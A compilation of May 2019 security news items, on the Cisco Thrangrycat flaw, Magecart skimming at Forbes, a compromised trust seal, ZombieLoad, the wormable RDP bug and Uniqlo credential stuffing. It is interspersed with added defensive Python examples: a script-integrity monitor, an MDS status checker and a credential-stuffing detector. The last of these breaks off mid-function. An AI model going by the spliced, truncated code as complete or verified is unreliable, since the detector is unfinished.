Cisco reported that the vulnerability (CVE-2019-1649) lies “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation” and “could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality.”

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The vulnerability, called Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls) and exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco also noted in regard to the Secure Boot vulnerability that it will release software patches, but there are no workarounds to address the issue.

An attacker could exploit this to gain full and permanent access to those networks. It also can't be fixed with a software patch, so it will be difficult for affected organizations to fully mitigate the threats this poses, according to Red Balloon Security.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”

Forbes Site Up, Then Down Again after Magecart Attack

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which could be linked to the ongoing supply chain attacks that have been reported by Willem de Groot this week. Forbes is, according to The Register, a customer of Picreel, which has been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

Supply Chain Attack Hits Best of the Web Website

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the site itself was injected with information-stealing malware.

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and according to his latest tweet, de Groot confirmed that the attackers used open S3 buckets to inject form jackers. De Groot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel,,,, and

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”
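Both the Forbes item above and this one come down to the same defensive problem: a script hosted by a third party (a trust seal on a CDN, a payment-page widget) can be altered upstream without the site owner noticing. The following is an added example, not code from Best of the Web, Panorays, The Media Trust or anyone quoted above, of the kind of audit Or-El's "continuously monitoring" advice implies: it parses a page for external script tags, compares each script body against a pinned SHA-256 baseline recorded at the last audit, and flags scripts loaded without a Subresource Integrity attribute. The URLs, script bodies, baseline and fetcher are constructed sample data.

```python
"""Baseline monitor for third-party scripts embedded in a page.

Added example (not code from the page or from any vendor named in it).
Assumptions: the page HTML and script bodies are supplied by a caller
(here via a constructed in-memory fetcher), and the baseline is a dict of
{script URL: SHA-256 hex digest} recorded when the script was last audited.
A real deployment would fetch over HTTPS on a schedule and persist the baseline.
"""
import base64
import hashlib
from html.parser import HTMLParser
from typing import Callable, Dict, List, Tuple


class _ScriptTagParser(HTMLParser):
    """Collect (src, has_integrity) for every <script src=...> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[str, bool]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag.lower() != "script":
            return
        attr_map = {k.lower(): (v or "") for k, v in attrs}
        src = attr_map.get("src")
        if src:
            self.scripts.append((src, "integrity" in attr_map))


def external_scripts(html: str) -> List[Tuple[str, bool]]:
    parser = _ScriptTagParser()
    parser.feed(html)
    return parser.scripts


def sha256_hex(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()


def sri_value(body: bytes) -> str:
    """Subresource Integrity attribute value (sha256-<base64>) for a script body."""
    digest = hashlib.sha256(body).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def audit_page(html: str, baseline: Dict[str, str],
               fetch: Callable[[str], bytes]) -> List[Dict[str, str]]:
    """Return one finding per third-party script that needs attention.

    Findings:
      - "modified": the body no longer matches the pinned baseline hash
        (the trust-seal case: a hosted script altered upstream).
      - "unpinned": the script is loaded without an integrity attribute, so
        the browser will execute whatever the CDN currently serves.
      - "unknown": no baseline exists yet for this script URL.
    """
    findings: List[Dict[str, str]] = []
    for src, has_integrity in external_scripts(html):
        body = fetch(src)
        actual = sha256_hex(body)
        expected = baseline.get(src)
        if expected is None:
            findings.append({"src": src, "status": "unknown", "sha256": actual})
        elif actual != expected:
            findings.append({"src": src, "status": "modified",
                             "expected": expected, "sha256": actual})
        if not has_integrity:
            findings.append({"src": src, "status": "unpinned",
                             "suggested_integrity": sri_value(body)})
    return findings


# Constructed sample data: a seal loader that was audited, then changed
# upstream (a harmless appended submit hook stands in for the modification).
GOOD_SEAL = b"window.renderSeal = function () { /* draw seal */ };\n"
TAMPERED_SEAL = GOOD_SEAL + b"document.addEventListener('submit', function () {});\n"
ANALYTICS = b"console.log('analytics');\n"

SAMPLE_HTML = """
<html><body>
<script src="https://cdn.example.invalid/seal.js"></script>
<script src="https://cdn.example.invalid/analytics.js"
        integrity="%s" crossorigin="anonymous"></script>
</body></html>
""" % sri_value(ANALYTICS)

SAMPLE_BASELINE = {
    "https://cdn.example.invalid/seal.js": sha256_hex(GOOD_SEAL),
    "https://cdn.example.invalid/analytics.js": sha256_hex(ANALYTICS),
}

# Constructed fetcher standing in for an HTTPS download of each script.
SAMPLE_BODIES = {
    "https://cdn.example.invalid/seal.js": TAMPERED_SEAL,
    "https://cdn.example.invalid/analytics.js": ANALYTICS,
}


def sample_audit() -> List[Dict[str, str]]:
    """Run the audit on the constructed page: seal.js is modified and unpinned."""
    return audit_page(SAMPLE_HTML, SAMPLE_BASELINE, SAMPLE_BODIES.__getitem__)


if __name__ == "__main__":
    for finding in sample_audit():
        print(finding)
```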

UK Fraud Complaints Surge Over 40%

UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6,952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.”

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Privacy campaigners are hailing a major legal victory after the Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Trump Declares National Emergency to Contain China Threat

The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on an “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted or not, this could put the firm in a serious position similar to ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firm broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Companies’ Stock Value Dropped 7.5% after Data Breaches

After analyzing the top three breaches from the past three years, Bitglass found that in the aftermath of a data breach, a decrease in stock price was a notable repercussion identifiable for publicly traded companies.

The report, Kings of the Monster Breaches, identified the extensive damage done by improper security by looking specifically at the Marriott breach of 2018, the Equifax breach of 2017 and the Yahoo! breach of 2016. These top three breaches had a widespread impact on individuals, with a reported mean number of 257 million individuals directly affected by each breach.  

Research also showed that these breaches have cost an average of $347 million in legal fees, penalties and remediation costs. “Marriott uncovered the breach while seeking GDPR compliance; the company is now being fined $912 million under the regulation,” the report said.

The top breaches resulted from outside attackers employing phishing campaigns, using malware or exploiting technical vulnerabilities, which was the case for Equifax. “Through this vulnerability, hackers were able to access sensitive data such as Social Security numbers, credit card numbers, full names, dates of birth, and home addresses. It took roughly two months for the breach to be discovered. The company’s CSO, Susan Mauldin, and CIO, David Webb, retired immediately after the security lapse had been announced,” according to the report.

Publicly traded companies suffered an average drop of 7.5% in their stock values and a mean market cap loss of $5.4 billion per company, and it reportedly took 46 days, on average, for those stock prices to return to their pre-breach levels. To date, the stock price of Equifax has not yet recovered.

"The largest breaches over the past three years have caused massive and irreparable damage to large enterprises and their stakeholders around the globe," said Rich Campagna, chief marketing officer of Bitglass.

"This should serve as a stark warning to organizations everywhere. If massive companies with seemingly endless resources are falling victim to external attacks, then companies of all sizes must remain vigilant in their cybersecurity efforts. It is only by taking a proactive approach to security that breaches can be prevented and data can truly be kept safe.”

IT Decision-Makers Willing to Share Threat Intel

The sharing mentality is starting to take hold across the cybersecurity industry, with the vast majority of security decision-makers confessing that they would be willing to share threat intelligence, according to a new publication by IronNet.

The report, Collective Offense Calls for Collective Defense: A Reality Check for Cybersecurity Decision Makers, surveyed 200 U.S. security IT decision-makers. Of those, 94% stated that their organization would be willing to increase the level of threat sharing with their industry peers if it demonstrably improved their ability to detect threats.

Additionally, 92% of respondents said they would even increase threat sharing with the government if it meant the government could use political, economic, cyber, or other national-level capabilities to deter cyber-attacks, the report said.

As nation-state attacks become more prevalent, threat actors are collaborating on techniques to make their attacks more profitable, leaving individual security teams to defend themselves against a collective offense.

The report also found that organizations are suffering an average of one cybersecurity incident every three months, with 80% saying the incident was so severe that it required C-level and/or board meetings afterward.

“Despite most IT decision makers’ reported confidence that their cybersecurity capabilities are advanced and in better shape than others in their industry (55%), they nonetheless experienced an average of four attacks on their organization over a 12-month period, with 20% of respondents being hit six or more times,” the report said.

“Organizations are increasingly grasping the need for better threat information sharing. Half of decision makers surveyed noted that their threat sharing tool could be improved upon, and 46% identified a need for enhanced sharing of cyber attacker tools, tactics, and procedures (TTP) and faster sharing of raw intelligence at network speed. The lack of such protections magnified the damage from recent attacks like Hydro Norsk, NotPetya, and others that quickly spread from company to company and could have been mitigated by better collective defense.”

Boost Mobile Alerts Customers of Security Incident

Customers of Boost Mobile are being urged to change their passwords and PINs after the company announced that it detected unauthorized activity from a third party.

“On March 14, 2019, experienced unauthorized online account activity in which an unauthorized person accessed your account through your Boost phone number and PIN code,” the notice of a security incident said.

“The Boost Mobile fraud team discovered the incident and was able to implement a permanent solution to prevent similar unauthorized account activity.”

Attackers using compromised credentials accounted for 29% of data breaches, according to Verizon’s 2019 Data Breach Investigation Report. The unauthorized access at Boost Mobile is what Byron Rashed, VP of marketing, Centripetal, called a classic example of a series of events that enables threat actors to infiltrate networks and exfiltrate customer data and/or personally identifiable information.

“Usually, a compromised credential from a third-party breach starts the process. The threat actor can use various unsophisticated/sophisticated techniques to either obtain a password or crack a hashed password. Once an account is compromised, the threat actor can find a way into the network and access various databases,” Rashed said.

“The credentials can be a typical customer/user and/or an admin that has network access. Threat actors can leverage various tools and social media to find out information on users/admins and obtain a password (such as the names of spouses, children, pets, etc.) and try different combinations using automated tools.”

In addition to urging customers to follow the security strategies set forth by the Federal Trade Commission, Boost Mobile sent a temporary PIN code via text message, reminding customers to avoid combinations such as "1234" or "0000."

“The best defense against attackers using stolen credentials is to use a password that is unique with various characters and one that does not contain anything that is specific to the individual as noted,” Rashed added.

“On the network defense side, shielding against known IPs, domains, and other sources is critical. Most breaches come from known sources. To shield these sources from the onset greatly increases the organization’s security posture.”

Hospitals Failing on Cybersecurity Hygiene

Healthcare organizations (HCOs) are increasingly at risk from legacy operating systems, device complexity and the use of commonly exploited protocols, according to a new study from Forescout.

The security vendor analyzed 75 global healthcare deployments running over 1.5 million devices across 10,000 virtual local area networks (VLANs).

It found that although less than 1% were running unsupported operating systems, 71% of Windows devices were on Windows 7, Windows 2008 or Windows Mobile, which will be end-of-lifed in January 2020 — less than a year away.

These HCOs are further exposing themselves to threats by using high-risk services like SMB, which was exploited in the infamous WannaCry attacks, as well as RDP, FTP and others. Some 85% of Windows devices had SMB turned on, while over a third (35%) were running RDP, which is commonly used in fileless attacks.

The sheer range of medical devices in use also presents greater cyber-risks, especially as many aren’t architected with security in mind, the report claimed.

A third (34%) of organizations’ medical VLANs were found to support more than 100 distinct device vendors. Even more are likely to exist on other networks.

Patching is often problematic due to the criticality of these devices and the fact that, in some cases, doing so invalidates the product’s warranty.

Even worse, in many cases, vendors are responsible for patching themselves, and sometimes devices are connected to the network without the oversight of IT, claimed the report.

Forescout argued that VLANs could help HCOs mitigate risk by segmenting their networks. However, in half (49%) of the deployments studied, medical devices were connected to 10 VLANs or fewer, suggesting insufficient investment in this strategy.

“Our findings reveal that healthcare organizations have some of the most diverse and complex IT environments, which are compounded due to compliance risks,” argued Elisa Costante, head of OT and industrial technology innovation at Forescout.

“Every time a patch is applied, there is concern around voiding a warranty or impacting patient safety. These organizations are dealing with life-saving devices and extremely sensitive environments.”

Although there has been an explosion in OT (8%) and IoT (39%) devices in recent years, the biggest potential attack surface on medical VLANs came from regular IT devices (53%), the report claimed.

“Wormable” Bug Could Enable Another WannaCry

Microsoft released fixes for 79 unique vulnerabilities yesterday, including 22 critical bugs — one of which could be used to spread malware around the globe.

Microsoft detailed the potential impact of CVE-2019-0708 in a separate blog post on Tuesday.

This is a flaw in Remote Desktop Services (RDS) which could allow an attacker to remotely execute arbitrary code on a target system after connecting using RDP.

Even worse, according to Microsoft, the bug is “wormable,” meaning that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

“While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware,” Microsoft warned.

Although the bug affects older operating systems — Windows 7, Windows Server 2008 R2 and Windows Server 2008 — it should be patched ASAP. Microsoft is even making fixes available for out-of-support versions XP and Windows 2003, such is the potential threat.

“CVE-2019-0708 should be the highest priority patching because, in addition to the wormable capabilities in this exploit, many modern ransomware variants, such as Dharma, Robbinhood, and CrySIS, often use vulnerable RDP servers to gain access to victim networks,” argued Recorded Future senior solutions architect, Allan Liska. “This vulnerability will make that process even easier.”

Elsewhere, IT admins should also fix a zero-day flaw (CVE-2019-0863), which is being exploited in the wild and has also been publicly disclosed, meaning other hackers could use it in their own attacks. It’s an elevation-of-privilege vulnerability in the way Windows Error Reporting handles files, which allows an attacker to gain kernel mode access to a victim system.

In addition, a publicly disclosed vulnerability in Skype for Android (CVE-2019-0932) could enable an attacker to snoop on conversations without a victim’s knowledge.

ZombieLoad Bugs Expose Intel Machines to Data Theft

Researchers have discovered a major new set of vulnerabilities in nearly all post-2011 Intel chips which could enable side-channel attacks targeting sensitive information.

ZombieLoad is reminiscent of the Spectre and Meltdown bugs reported in January 2018 in that it affects not only desktop and laptop machines but also cloud servers. Like them, it exploits the speculative execution process to enable attackers to steal data from the processor.

Technically known as a “data sampling attack,” it’s far from trivial to launch, but should be addressed immediately by admins as it could theoretically allow attackers to monitor a victim’s browsing in real-time, or steal sensitive credentials and data.

“While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs,” the research paper claimed. “These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys.”

ZombieLoad (CVE-2018-12130) is the most dangerous vulnerability, although the researchers also found three others: CVE-2018-12126, CVE-2018-12127 and CVE-2019-11091. Intel calls these Microarchitectural Data Sampling (MDS) flaws.

“All of them have in common that they trigger a faulty read, and extract data used by transiently executed operations via a side-channel,” said the researchers in an accompanying blog post.

The good news is that Intel has already addressed MDS issues post-Spectre/Meltdown, so its newer chips (8th and 9th Generation Intel Core processors and 2nd Generation Intel Xeon Scalable processor family) aren’t affected.

It has also released microcode updates to address the vulnerabilities, although these could apparently have a 9% performance hit on cloud machines and around 3% on desktops and laptops. Apple, Google, and Microsoft have already released patches to fix ZombieLoad.
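The practical question for an admin after reading the above is whether a given Linux host already has the MDS fix in place. The kernel reports this in one line under /sys/devices/system/cpu/vulnerabilities/mds. The following is an added example, not code from the article or from Intel or the researchers: it reads that file when present and otherwise classifies a few constructed status lines written in the format the kernel uses. The recommended-action strings are this example's own choices.

```python
"""Classify the Linux kernel's reported MDS (ZombieLoad) mitigation status.

Added example. The kernel exposes one status line per speculative-execution
issue under /sys/devices/system/cpu/vulnerabilities/; `mds` is the file for
the four MDS CVEs. Action strings are assumptions for illustration.
"""
from typing import Optional

MDS_SYSFS = "/sys/devices/system/cpu/vulnerabilities/mds"

# Constructed sample values in the kernel's format, used when the file is absent.
SAMPLE_STATUSES = [
    "Not affected",
    "Vulnerable",
    "Vulnerable: Clear CPU buffers attempted, no microcode; SMT vulnerable",
    "Mitigation: Clear CPU buffers; SMT vulnerable",
    "Mitigation: Clear CPU buffers; SMT disabled",
]


def recommend(v: dict) -> str:
    """Map the parsed flags to the next step an admin should take."""
    if not v["affected"]:
        return "none"
    if not v["mitigated"]:
        if v["microcode_missing"]:
            # Kernel has the buffer-clearing code but the CPU lacks the
            # microcode that makes it effective.
            return "install CPU microcode update, then reboot"
        return "update kernel and microcode"
    if v["smt_risk"]:
        # Buffer clearing does not protect against a sibling hyperthread.
        return "mitigated; consider disabling SMT on hosts running untrusted code"
    return "mitigated"


def classify_mds(status: str) -> dict:
    """Turn one sysfs status line into a verdict dict with an action."""
    s = status.strip()
    verdict = {
        "raw": s,
        "affected": not s.startswith("Not affected"),
        "mitigated": s.startswith("Mitigation:"),
        "microcode_missing": "no microcode" in s,
        "smt_risk": "SMT vulnerable" in s,
    }
    verdict["action"] = recommend(verdict)
    return verdict


def read_mds_status(path: str = MDS_SYSFS) -> Optional[str]:
    """Return the live status line, or None when not on Linux or file absent."""
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return None


if __name__ == "__main__":
    live = read_mds_status()
    for line in ([live] if live else SAMPLE_STATUSES):
        v = classify_mds(line)
        print(f"{v['raw']!r:75} -> {v['action']}")
```

On a fleet, the same function can be fed the output of the sysfs file collected by whatever inventory tooling is in use; the "SMT vulnerable" case is the one most often overlooked, since the host reports a mitigation while a co-scheduled tenant on the sibling thread can still sample the buffers.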

San Francisco Votes to Ban Facial Recognition

Lawmakers in San Francisco will vote today on legislation that would ban the use of facial recognition technology among city departments, according to NPR.

If approved, the law would make San Francisco the first city to ban the technology's use, a ban that would extend to police body cameras. “Governments have used the technology for several years, and the software can assist with efforts to find missing children, for example, or prevent driver's license fraud,” NPR reported.

That the technology is so widely used is evidence of what happens when the pace of adoption moves too swiftly. “It’s good to see legislators and others taking technological innovations seriously – especially in terms of this one-to-many use case where facial recognition might be used to pick a face out of a crowd,” said Sam Bakken, senior product marketing manager at OneSpan.

“It’s important to remember though that one-to-one use cases such as that facilitated by Apple Face ID and other technology whereby a user willingly enrolls in the system to allow them to unlock their phone or log into other accounts using their face makes it easy and convenient for consumers to add an additional layer of security to their mobile devices and accounts.”

The proposed legislation is intended to address those instances where individuals are not consenting to have their images included in a database, but not all experts agree that the move to ban the technology is a step in the right direction.

“This is backwards thinking when it comes to public safety and an equally illogical argument could be made against using fingerprints and DNA evidence, which are also left behind without intent or permission but are instrumental in providing leads that solve countless crimes and bring violent criminals to justice. We have a constitutional presumption of innocence that protects us. If facial recognition or fingerprint matching or DNA testing provides clues to law enforcement agencies, they should not be barred from following up on them,” said John Gunn, CMO, OneSpan.

Speculators Look to ID AVs Hacked by Russia

Last week Infosecurity Magazine reported on threat intelligence published by Advanced Intelligence (AdvIntel) claiming that three US antivirus companies had been hacked by a top-tier Russian hacking collective.

While the original research did not identify the impacted companies, both Gizmodo and Bleeping Computer have reported that McAfee, Symantec and Trend Micro are the three companies in question.

Although AdvIntel tries to adhere to its general rule of not discussing victim entities, a company spokesperson said in an email, “Given the latest independent corroboration and publication, we can confirm that Trend Micro and McAfee were two of the companies that were claimed to be breached by the actor group with their internal access and data for sale.”

Trend Micro has confirmed that an unauthorized third party accessed a single testing lab network. “We have an active investigation underway related to recent claims, and while it is not complete, we want to transparently share what we have learned. Working closely with law enforcement, our global threat research and forensic teams are leading this investigation,” a Trend Micro spokesperson wrote in an email.

“Some low-risk debugging related information was obtained. We are nearing the end of our investigation and at this time we have seen no indication that any customer data nor source code were accessed or exfiltrated. Immediate action was taken to quarantine the lab and additionally secure all corresponding environments. Due to the active nature of the investigation, we are not in a position to share any additional information, but we will provide an update when additional insights become available and can be disclosed.”

A McAfee spokesperson wrote, “McAfee has been conducting a thorough investigation into these claims. To date, we’ve found no indication that McAfee products, services or networks have been impacted by the campaign described.”

AdvIntel said that it had reached out to all of the purported victims, as well as law enforcement, regarding Fxmsp well before its initial blog was released. Though the company did not comment on whether Symantec was one of the breached companies, there has been speculation that Symantec is the third victim.

Symantec said it is aware of recent claims that a number of US-based antivirus companies were breached, and a spokesperson said, “We have been in contact with researchers at AdvIntel, who confirmed that Symantec (Norton) has not been impacted. We do not believe there is reason for our customers to be concerned.”

*AdvIntel admitted in a message to Computer Business Review that Fxmsp had not provided “sufficient evidence to support this allegation [that Symantec was hacked].” The company added: “We believe with a high degree of confidence that Symantec’s assessment of risks and their statement that ‘there is no reason for our [Symantec] customers to be concerned currently’ is correct.”

*Updated May 15 to include statement from CBR shared with Infosecurity by Symantec.

Over 460,000 E-Retailer User Accounts Hacked

Fast Retailing Co., Asia’s largest retailer, released a statement acknowledging that hackers likely gained access to the personal information of nearly half a million Uniqlo and GU brand e-commerce portal users.

“It was confirmed on May 10, 2019 that an unauthorized login by a third party other than the customer occurred on the online store site operated by our company. Although the number of targets and the situation may change according to the progress of the future survey, we will report the facts confirmed at present and our response,” according to a translation of the company's statement.

“This fraudulent login was performed from April 23 to May 10, 2019 by the method of 'list-type account hacking (list-type attack),' and the number of accounts logged-in illegally as of the present is 461,091. We deeply apologize to our customers and stakeholders for any inconvenience or concern. We will strive to further enhance security and ensure safety so that similar events do not occur.”

Not only are the password owners at risk, but e-commerce businesses with user login pages are also at risk of being the next company to suffer a breach, according to Rami Essaid, co-founder of Distil Networks.

“Data breaches like Uniqlo create huge spikes in bot traffic on the login screens of websites, as hackers cycle through enormous lists of stolen passwords. Password dumps create a ripple effect of organizations spending precious time and resources on damage control,” Essaid said.

First there is “the massive spike in failed logins, then the access into someone else’s account before the hacker changes the password, then the account lock-out for the real user, then the customer service calls to regain access to their account. All because a username and password was stolen from a different website," Essaid continued. "While it’s important that individual web users have strong, secure logins, the onus is on the businesses to detect and block malicious bot traffic before large-scale password hacks can occur.”
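The pattern Essaid describes, a burst of failed logins from one source cycling through many different accounts with the occasional hit, is what a list-type (credential-stuffing) attack looks like in a login log, and it is distinguishable from a single user mistyping a password. The detector below is an added example, not code from the article or from Distil Networks or Fast Retailing: it runs over a constructed log in an assumed "<ISO time> <ip> <username> <ok|fail>" format, and the window size and thresholds are illustrative assumptions.

```python
"""Flag credential-stuffing (list-type attack) patterns in a login log.

Added example. Input format, window and thresholds are assumptions; the log
below is constructed: one IP cycling a password list across many accounts,
one user retrying their own password, and one ordinary login.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2019-05-10T09:00:01 203.0.113.5 alice fail
2019-05-10T09:00:02 203.0.113.5 bob fail
2019-05-10T09:00:02 203.0.113.5 carol fail
2019-05-10T09:00:03 203.0.113.5 dave ok
2019-05-10T09:00:03 203.0.113.5 erin fail
2019-05-10T09:00:04 203.0.113.5 frank fail
2019-05-10T09:00:05 203.0.113.5 grace fail
2019-05-10T09:00:06 203.0.113.5 heidi fail
2019-05-10T09:00:07 203.0.113.5 ivan fail
2019-05-10T09:00:08 203.0.113.5 judy ok
2019-05-10T09:01:00 198.51.100.7 alice fail
2019-05-10T09:01:05 198.51.100.7 alice fail
2019-05-10T09:01:09 198.51.100.7 alice ok
2019-05-10T09:02:00 192.0.2.9 mallory ok
"""

WINDOW = timedelta(minutes=5)
MIN_ATTEMPTS = 8        # attempts from one IP inside the window
MIN_DISTINCT_USERS = 5  # many different accounts, not one user retrying
MIN_FAIL_RATIO = 0.6    # most attempts fail: a stolen list rarely matches


def parse(log_text):
    """Parse the assumed log format into (time, ip, user, success) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, user, result == "ok"))
    return events


def detect_stuffing(events):
    """Return {ip: stats} for IPs whose activity inside some WINDOW looks
    like a password list being cycled through many accounts. For each IP
    the largest qualifying window is kept."""
    by_ip = defaultdict(list)
    for ts, ip, user, ok in sorted(events):
        by_ip[ip].append((ts, user, ok))
    flagged = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Advance the window start until evs[start..end] fits in WINDOW.
            while evs[end][0] - evs[start][0] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            attempts = len(window)
            users = {u for _, u, _ in window}
            fails = sum(1 for _, _, ok in window if not ok)
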